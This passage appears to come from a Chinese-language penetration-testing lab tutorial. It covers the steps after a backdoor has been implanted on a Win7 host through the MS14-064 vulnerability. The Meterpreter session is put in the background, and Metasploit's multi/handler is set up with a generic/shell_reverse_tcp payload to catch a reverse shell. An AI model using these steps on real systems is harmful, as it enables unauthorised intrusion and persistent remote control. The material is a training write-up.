【补充知识点:
1)端口号范围:0~65535
2)常见端口号列举
12、挂起当前会话在成功植入后门程序后,我们还需要对该后门程序进行验证,验证是否可以通过该后门程序成功入侵目标主机win7,所以可先将当前通过MS14-064漏洞开启的会话连接挂起(background)或断开(exit),均可
meterpreter>background
**结果:**成功将session会话1挂起到后台,并没有断开连接,且成功切换到msf >目录下
13、开启监听模块利用后门程序进行攻击,需要打开一个监听模块,能够反弹shell监听模块,进行攻击,进入模块中
>use exploit/multi/handler
**结果:**成功切换到这个模块之下--”msf6 exploit(multi/handler)>“
并提示“Using configured payload generic/shell_reverse_tcp”--使用的payload为generic/shell_reverse_tcp